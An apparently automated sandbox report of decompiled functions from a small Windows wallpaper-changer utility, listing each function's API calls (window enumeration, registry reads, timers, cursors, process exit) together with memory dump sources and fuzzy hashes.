                                  • Instruction ID: d8457b7cfc01845025ff0f1481e631499ec3f4561d4f15b9316b41f804d9865f
                                  • Opcode Fuzzy Hash: cc7bb251413e2d7370e4f07b8def1cf3fc546229712c83989b59146fa39c66a7
                                  • Instruction Fuzzy Hash: 9E418070A0020CABDB11DBA1C952BDEB7F9EF48708F10447AA914A7282DB799F559788
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00455280(void* __eax, void* __edx) {
                                  				int _t18;
                                  				int _t20;
                                  				void* _t34;
                                  				void* _t36;
                                  				void* _t38;
                                  
                                  				_t34 = __eax;
                                  				_t18 =  *0x470b40; // 0x0
                                  				if( *((intOrPtr*)(_t18 + 0x30)) != 0) {
                                  					if(__edx == 0) {
                                  						if( *((intOrPtr*)(__eax + 0x9c)) != 0) {
                                  							L6:
                                  							 *((intOrPtr*)(_t34 + 0x9c)) =  *((intOrPtr*)(_t34 + 0x9c)) + 1;
                                  							return _t18;
                                  						}
                                  						EnumWindows(E00455210, 0);
                                  						_t3 = _t34 + 0x98; // 0x0
                                  						_t18 =  *( *_t3 + 8);
                                  						if(_t18 <= 0) {
                                  							goto L6;
                                  						}
                                  						_t38 = _t18 - 1;
                                  						if(_t38 < 0) {
                                  							goto L6;
                                  						} else {
                                  							goto L5;
                                  						}
                                  						do {
                                  							L5:
                                  							asm("cmc");
                                  							asm("sbb eax, eax");
                                  							_t5 = _t34 + 0x98; // 0x0
                                  							_t18 = ShowOwnedPopups(E00413D2C( *_t5, _t38), _t18);
                                  							_t38 = _t38 - 1;
                                  						} while (_t38 != 0xffffffff);
                                  						goto L6;
                                  					}
                                  					if( *((intOrPtr*)(__eax + 0x9c)) > 0) {
                                  						 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__eax + 0x9c)) - 1;
                                  						if( *((intOrPtr*)(__eax + 0x9c)) == 0) {
                                  							_t12 = _t34 + 0x98; // 0x0
                                  							_t20 =  *( *_t12 + 8);
                                  							if(_t20 <= 0) {
                                  								L12:
                                  								_t15 = _t34 + 0x98; // 0x0
                                  								return  *((intOrPtr*)( *((intOrPtr*)( *_t15)) + 8))();
                                  							}
                                  							_t36 = _t20 - 1;
                                  							if(_t36 < 0) {
                                  								goto L12;
                                  							} else {
                                  								goto L11;
                                  							}
                                  							do {
                                  								L11:
                                  								asm("cmc");
                                  								asm("sbb eax, eax");
                                  								_t14 = _t34 + 0x98; // 0x0
                                  								_t20 = ShowOwnedPopups(E00413D2C( *_t14, _t36), _t20);
                                  								_t36 = _t36 - 1;
                                  							} while (_t36 != 0xffffffff);
                                  							goto L12;
                                  						}
                                  					}
                                  				}
                                  				return _t18;
                                  			}








                                  APIs
                                  • EnumWindows.USER32(00455210,00000000), ref: 004552AA
                                  • ShowOwnedPopups.USER32(00000000,?,00455210,00000000,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 004552D9
                                  • ShowOwnedPopups.USER32(00000000,?,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 0045532E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: OwnedPopupsShow$EnumWindows
                                  • String ID:
                                  • API String ID: 2480833221-0
                                  • Opcode ID: 2def97d80cd3fd5cf14bd8411b48f3a52973277e93ca50c5574ee215c9a1795f
                                  • Instruction ID: d497bf893ac0bc5066ebfb868d005e13283c7ee60e91fbd506b006b56cc35223
                                  • Opcode Fuzzy Hash: 2def97d80cd3fd5cf14bd8411b48f3a52973277e93ca50c5574ee215c9a1795f
                                  • Instruction Fuzzy Hash: 4921C330B10900DBE710AA79C454BB2F3D4BB0536AF014273EC1CD7293D778AC888B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C6B8() {
                                  				signed short _t13;
                                  				int _t17;
                                  				signed int _t21;
                                  				signed int _t22;
                                  				void* _t34;
                                  				void* _t35;
                                  
                                  				 *0x470744 = 0x409;
                                  				 *0x00470748 = 9;
                                  				 *0x0047074C = 1;
                                  				_t13 = GetThreadLocale();
                                  				if(_t13 != 0) {
                                  					 *0x470744 = _t13;
                                  				}
                                  				if(_t13 != 0) {
                                  					 *0x00470748 = _t13 & 0x3ff;
                                  					 *0x0047074C = (_t13 & 0x0000ffff) >> 0xa;
                                  				}
                                  				memcpy(0x46e10c, 0x40c75c, 8 << 2);
                                  				_t34 = 0x470744;
                                  				if( *0x46e0c8 <= 4 ||  *0x46e0c4 != 2) {
                                  					 *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000;
                                  				} else {
                                  					 *0x0040C769 = 1;
                                  				}
                                  				_t17 = GetSystemMetrics(0x2a); // executed
                                  				_t22 = _t21 & 0xffffff00 | _t17 != 0x00000000;
                                  				 *(_t34 + 0xc) = _t22;
                                  				if(_t22 != 0) {
                                  					return E0040C65C(_t35);
                                  				}
                                  				return _t17;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$LocaleThread
                                  • String ID:
                                  • API String ID: 2159509485-0
                                  • Opcode ID: 73e21735d2d470ef33b083651008ddfbeeade792b83ec37465bb7a41fe3d4666
                                  • Instruction ID: 25bc861dfbb162038f8d57caf5f88a7b27439012bb2620b58017c3d598e623a1
                                  • Opcode Fuzzy Hash: 73e21735d2d470ef33b083651008ddfbeeade792b83ec37465bb7a41fe3d4666
                                  • Instruction Fuzzy Hash: E8014874601762CAD3206B27984136377C89B01328F14C53FD8CA973C2EBBD9841C7AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0041B3E0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) {
                                  				long _t16;
                                  				intOrPtr* _t32;
                                  				char* _t35;
                                  				intOrPtr* _t37;
                                  
                                  				_pop(_t37);
                                  				 *__eax =  *__eax + __eax;
                                  				 *((intOrPtr*)(__ebx + 0x56)) =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
                                  				_push(__ebx);
                                  				_push(__ecx);
                                  				_t35 = __ecx;
                                  				_t32 = __eax;
                                  				E00402D4C(__ecx, 8);
                                  				_t16 = RegQueryValueExA( *(_t32 + 4), E004045DC(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed
                                  				 *_t35 = E0041AFDC( *_t37);
                                  				return __ebx & 0xffffff00 | _t16 == 0x00000000;
                                  			}







                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0041B448), ref: 0041B416
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID: MS Shell Dlg 2
                                  • API String ID: 3660427363-3198668166
                                  • Opcode ID: ed845f8dcf90eb0cc11f9e84d8f7677c97b06d6a29b17cecb4727d57062212db
                                  • Instruction ID: aefe155333a5f554399655cdce492367360bfc68df5fac8bae1159c4d8749238
                                  • Opcode Fuzzy Hash: ed845f8dcf90eb0cc11f9e84d8f7677c97b06d6a29b17cecb4727d57062212db
                                  • Instruction Fuzzy Hash: BBF0827234D2446FD705EAAD9C41BAB7B9C9BC5310F04407FF548CB582DA24CD09836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0041B3E4(void* __eax, char* __ecx, void* __edx, void* __fp0) {
                                  				long _t14;
                                  				signed int _t18;
                                  				void* _t26;
                                  				char* _t27;
                                  				intOrPtr* _t28;
                                  
                                  				_push(__ecx);
                                  				_t27 = __ecx;
                                  				_t26 = __eax;
                                  				E00402D4C(__ecx, 8);
                                  				_t14 = RegQueryValueExA( *(_t26 + 4), E004045DC(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed
                                  				 *_t27 = E0041AFDC( *_t28);
                                  				return _t18 & 0xffffff00 | _t14 == 0x00000000;
                                  			}








                                  APIs
                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0041B448), ref: 0041B416
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID: MS Shell Dlg 2
                                  • API String ID: 3660427363-3198668166
                                  • Opcode ID: 2da5db203743ed54820ef3ee7726ef91f0ab6d4267825aece351203e893c3290
                                  • Instruction ID: 97723ca3acc37bd935a7c2b7deee96411dc323b6a488666b4662ccd014304408
                                  • Opcode Fuzzy Hash: 2da5db203743ed54820ef3ee7726ef91f0ab6d4267825aece351203e893c3290
                                  • Instruction Fuzzy Hash: 9FF01C723491086BD614EAAA9D41FAB779CDB85354F00803AF648CB282DA25DD058765
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00401A1C: RtlInitializeCriticalSection.KERNEL32(004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A32
                                    • Part of subcall function 00401A1C: RtlEnterCriticalSection.KERNEL32(004705C8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A45
                                    • Part of subcall function 00401A1C: LocalAlloc.KERNEL32(00000000,00000FF8,004705C8,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401A6F
                                    • Part of subcall function 00401A1C: RtlLeaveCriticalSection.KERNEL32(004705C8,00401AD9,00000000,U ,?,?,004022BE,020F0000,?,00000000,?,?,00401CAD,00401CC2,00401E13), ref: 00401ACC
                                  • RtlEnterCriticalSection.KERNEL32(004705C8,00000000,0040228C), ref: 0040215B
                                  • RtlLeaveCriticalSection.KERNEL32(004705C8,00402293), ref: 00402286
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: a18e85b430b85e59c87229bf541772c929af1a8cfe70f22bcb04cc32c194dd05
                                  • Instruction ID: 154c07d58550e4a9f7b7a054e7c0f7fc40a85cc97c5f19c7892ccd633171cae9
                                  • Opcode Fuzzy Hash: a18e85b430b85e59c87229bf541772c929af1a8cfe70f22bcb04cc32c194dd05
                                  • Instruction Fuzzy Hash: D84106B1A02305DFE714CF68EE9562A77A1F789314B2441BFD408E77E1D678A981CB4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404028() {
                                  				int _t18;
                                  				void* _t32;
                                  				struct HINSTANCE__* _t41;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  
                                  				if( *0x0047065C != 0 ||  *0x470044 == 0) {
                                  					L3:
                                  					if( *0x46e004 != 0) {
                                  						E00403F08();
                                  						E00403F9C(_t32);
                                  						 *0x46e004 = 0;
                                  					}
                                  					L5:
                                  					while(1) {
                                  						if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
                                  							 *0x00470640 = 0;
                                  						}
                                  						E00403DB0(); // executed
                                  						if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
                                  							_t36 =  *0x00470644;
                                  							if( *0x00470644 != 0) {
                                  								E00405744(_t36);
                                  								_t43 =  *((intOrPtr*)(0x470644));
                                  								_t7 = _t43 + 0x10; // 0x400000
                                  								_t41 =  *_t7;
                                  								_t8 = _t43 + 4; // 0x400000
                                  								if(_t41 !=  *_t8 && _t41 != 0) {
                                  									FreeLibrary(_t41);
                                  								}
                                  							}
                                  						}
                                  						E00403D88();
                                  						if( *((char*)(0x47065c)) == 1) {
                                  							 *0x00470658();
                                  						}
                                  						if( *((char*)(0x47065c)) != 0) {
                                  							E00403F6C();
                                  						}
                                  						if( *0x470634 == 0) {
                                  							if( *0x470024 != 0) {
                                  								 *0x470024();
                                  							}
                                  							_t18 =  *0x46e000; // 0x0
                                  							ExitProcess(_t18); // executed
                                  						}
                                  						memcpy(0x470634,  *0x470634, 0xb << 2);
                                  						_t44 = _t44 + 0xc;
                                  					}
                                  				} else {
                                  					do {
                                  						 *0x470044 = 0;
                                  						 *((intOrPtr*)( *0x470044))();
                                  					} while ( *0x470044 != 0);
                                  					goto L3;
                                  				}
                                  			}









                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: 12af02ec4315c38aa48986513f99f52d4ebe9cd618b56ac68f6f9c03ed3c242c
                                  • Instruction ID: d0f3875a72f99f463ae980fa8ec6b1d0a322450470e2545c1aa00f9e293a7eda
                                  • Opcode Fuzzy Hash: 12af02ec4315c38aa48986513f99f52d4ebe9cd618b56ac68f6f9c03ed3c242c
                                  • Instruction Fuzzy Hash: 71215CB09012509BDB21AF3588483573BE5AB85318F1545BBDB04B73D6D7BC9C80CB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404020() {
                                  				intOrPtr* _t13;
                                  				int _t21;
                                  				void* _t36;
                                  				struct HINSTANCE__* _t47;
                                  				intOrPtr _t50;
                                  				void* _t51;
                                  
                                  				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                                  				if( *0x0047065C != 0 ||  *0x470044 == 0) {
                                  					L5:
                                  					if( *0x46e004 != 0) {
                                  						E00403F08();
                                  						E00403F9C(_t36);
                                  						 *0x46e004 = 0;
                                  					}
                                  					L7:
                                  					if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
                                  						 *0x00470640 = 0;
                                  					}
                                  					E00403DB0(); // executed
                                  					if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
                                  						_t41 =  *0x00470644;
                                  						if( *0x00470644 != 0) {
                                  							E00405744(_t41);
                                  							_t50 =  *((intOrPtr*)(0x470644));
                                  							_t7 = _t50 + 0x10; // 0x400000
                                  							_t47 =  *_t7;
                                  							_t8 = _t50 + 4; // 0x400000
                                  							if(_t47 !=  *_t8 && _t47 != 0) {
                                  								FreeLibrary(_t47);
                                  							}
                                  						}
                                  					}
                                  					E00403D88();
                                  					if( *((char*)(0x47065c)) == 1) {
                                  						 *0x00470658();
                                  					}
                                  					if( *((char*)(0x47065c)) != 0) {
                                  						E00403F6C();
                                  					}
                                  					if( *0x470634 == 0) {
                                  						if( *0x470024 != 0) {
                                  							 *0x470024();
                                  						}
                                  						_t21 =  *0x46e000; // 0x0
                                  						ExitProcess(_t21); // executed
                                  					}
                                  					memcpy(0x470634,  *0x470634, 0xb << 2);
                                  					_t51 = _t51 + 0xc;
                                  					goto L7;
                                  				} else {
                                  					do {
                                  						 *0x470044 = 0;
                                  						 *((intOrPtr*)( *0x470044))();
                                  					} while ( *0x470044 != 0);
                                  					goto L5;
                                  				}
                                  			}










                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: 21171fad3894dd2f994fd8b975ce1c4a1e45cc821d61df0cd9bec43aafbacf17
                                  • Instruction ID: f84a6c8b7f14e96f86cc387e9a4454369665147cdd85f1117466e152b3cc321e
                                  • Opcode Fuzzy Hash: 21171fad3894dd2f994fd8b975ce1c4a1e45cc821d61df0cd9bec43aafbacf17
                                  • Instruction Fuzzy Hash: 44216DB08012909FDB21AF7588483563BE0AF85318F1545BBEB04772D6D7BC9C80CB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404024() {
                                  				int _t20;
                                  				void* _t35;
                                  				struct HINSTANCE__* _t46;
                                  				intOrPtr _t49;
                                  				void* _t50;
                                  
                                  				if( *0x0047065C != 0 ||  *0x470044 == 0) {
                                  					L4:
                                  					if( *0x46e004 != 0) {
                                  						E00403F08();
                                  						E00403F9C(_t35);
                                  						 *0x46e004 = 0;
                                  					}
                                  					L6:
                                  					if( *((char*)(0x47065c)) == 2 &&  *0x46e000 == 0) {
                                  						 *0x00470640 = 0;
                                  					}
                                  					E00403DB0(); // executed
                                  					if( *((char*)(0x47065c)) <= 1 ||  *0x46e000 != 0) {
                                  						_t40 =  *0x00470644;
                                  						if( *0x00470644 != 0) {
                                  							E00405744(_t40);
                                  							_t49 =  *((intOrPtr*)(0x470644));
                                  							_t7 = _t49 + 0x10; // 0x400000
                                  							_t46 =  *_t7;
                                  							_t8 = _t49 + 4; // 0x400000
                                  							if(_t46 !=  *_t8 && _t46 != 0) {
                                  								FreeLibrary(_t46);
                                  							}
                                  						}
                                  					}
                                  					E00403D88();
                                  					if( *((char*)(0x47065c)) == 1) {
                                  						 *0x00470658();
                                  					}
                                  					if( *((char*)(0x47065c)) != 0) {
                                  						E00403F6C();
                                  					}
                                  					if( *0x470634 == 0) {
                                  						if( *0x470024 != 0) {
                                  							 *0x470024();
                                  						}
                                  						_t20 =  *0x46e000; // 0x0
                                  						ExitProcess(_t20); // executed
                                  					}
                                  					memcpy(0x470634,  *0x470634, 0xb << 2);
                                  					_t50 = _t50 + 0xc;
                                  					goto L6;
                                  				} else {
                                  					do {
                                  						 *0x470044 = 0;
                                  						 *((intOrPtr*)( *0x470044))();
                                  					} while ( *0x470044 != 0);
                                  					goto L4;
                                  				}
                                  			}









                                  APIs
                                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040B0
                                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040410E,004027F3,0040283A,Philipp Winterberg's Command Line Wallpaper Changer Portable 1.00 [www.p78.de],00000000,0040271C,?,?,?,00000000), ref: 004040E8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ExitFreeLibraryProcess
                                  • String ID:
                                  • API String ID: 1404682716-0
                                  • Opcode ID: b0814196e5adcb1db59610301452141c150887b4a63c9d44826f5b2ab0648a41
                                  • Instruction ID: 96844a66afa6844c28e6c2d961964a1061cf20ac4f8d982b6510397bb74ccb12
                                  • Opcode Fuzzy Hash: b0814196e5adcb1db59610301452141c150887b4a63c9d44826f5b2ab0648a41
                                  • Instruction Fuzzy Hash: F0214CB09012519BDF21AF6588483563BE4AB85319F1545BBEB04772D6D7BC9C80CB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E0042E510(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                                  				char _v8;
                                  				int _t17;
                                  				intOrPtr _t18;
                                  				void* _t23;
                                  				intOrPtr _t28;
                                  				int _t32;
                                  				intOrPtr _t35;
                                  
                                  				_push(0);
                                  				_t23 = __eax;
                                  				_push(_t35);
                                  				_push(0x42e58f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t35;
                                  				KillTimer( *(__eax + 0x34), 1);
                                  				_t32 =  *(_t23 + 0x30);
                                  				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
                                  					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
                                  					if(_t17 == 0) {
                                  						_t18 =  *0x46fd9c; // 0x41b670
                                  						E00405C70(_t18,  &_v8);
                                  						E0040B830(_v8, 1);
                                  						E00403B64();
                                  					}
                                  				}
                                  				_pop(_t28);
                                  				 *[fs:eax] = _t28;
                                  				_push(0x42e596);
                                  				return E0040411C( &_v8);
                                  			}











                                  APIs
                                  • KillTimer.USER32(?,00000001,00000000,0042E58F,?,?,?,00000000), ref: 0042E52D
                                  • SetTimer.USER32(?,00000001,?,00000000), ref: 0042E54F
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Timer$KillLoadString
                                  • String ID:
                                  • API String ID: 1423459280-0
                                  • Opcode ID: bdeaa2d0bcc86ec05bcf81ae964e93581af7120666b31909328b1525a8718864
                                  • Instruction ID: 19790332f25139d28a8781680781d9b6593a6125af45755c17349908bb212159
                                  • Opcode Fuzzy Hash: bdeaa2d0bcc86ec05bcf81ae964e93581af7120666b31909328b1525a8718864
                                  • Instruction Fuzzy Hash: 4C01B9307103147BD710EF96DC42B5637ACDB09708F9144A6F900572D2E279AD80C65C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00453C18(void* __eax) {
                                  				struct HICON__* _t5;
                                  				void* _t7;
                                  				void* _t8;
                                  				struct HINSTANCE__* _t11;
                                  				CHAR** _t12;
                                  				void* _t13;
                                  
                                  				_t13 = __eax;
                                  				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				_t8 = 0xffffffea;
                                  				_t12 = 0x46efd8;
                                  				do {
                                  					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                  						if(_t8 != 0xffffffeb) {
                                  							_t11 = 0;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					} else {
                                  						L4:
                                  						_t11 =  *0x470664; // 0x400000
                                  					}
                                  					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                  					_t7 = E00453CD4(_t13, _t5, _t8);
                                  					_t8 = _t8 + 1;
                                  					_t12 =  &(_t12[1]);
                                  				} while (_t8 != 0xffffffff);
                                  				return _t7;
                                  			}










                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: faf394f74a5a76277292f8f3109476e2ce605c8074518ccec34124b65b1660ea
                                  • Instruction ID: 8dba9e2d3183789ffca0dc11a5138402d5b26a0a19d73125cf67f6c9b6e533ad
                                  • Opcode Fuzzy Hash: faf394f74a5a76277292f8f3109476e2ce605c8074518ccec34124b65b1660ea
                                  • Instruction Fuzzy Hash: 13F08223B0024416AA25293E4CC1D2A72859BD1777B21033BFD3AE72D6C63E6D595259
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041B074(void* __eax) {
                                  				void* _t7;
                                  				void* _t14;
                                  
                                  				_t14 = __eax;
                                  				_t7 =  *(__eax + 4);
                                  				if(_t7 != 0) {
                                  					if( *((char*)(__eax + 0xc)) == 0) {
                                  						RegFlushKey(_t7);
                                  					}
                                  					RegCloseKey( *(_t14 + 4)); // executed
                                  					 *(_t14 + 4) = 0;
                                  					return E0040411C(_t14 + 0x10);
                                  				}
                                  				return _t7;
                                  			}






                                  APIs
                                  • RegFlushKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B085
                                  • RegCloseKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B08E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseFlush
                                  • String ID:
                                  • API String ID: 320916635-0
                                  • Opcode ID: 8d47401f022365cdb71e2ccf3c1b26fc193530ee717e70d92ac999f8f23fbfbd
                                  • Instruction ID: fbce6248488ed43558be84fdacfe256e5be37f47779b5215429c1e581fe7ffbf
                                  • Opcode Fuzzy Hash: 8d47401f022365cdb71e2ccf3c1b26fc193530ee717e70d92ac999f8f23fbfbd
                                  • Instruction Fuzzy Hash: 96D012B06002048ADF50DF7588C57477BD86F48304B08C4BBA809DF297E639C4908B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0041AD00(struct HWND__* __eax) {
                                  				long _t2;
                                  				struct HWND__* _t6;
                                  
                                  				_t6 = __eax;
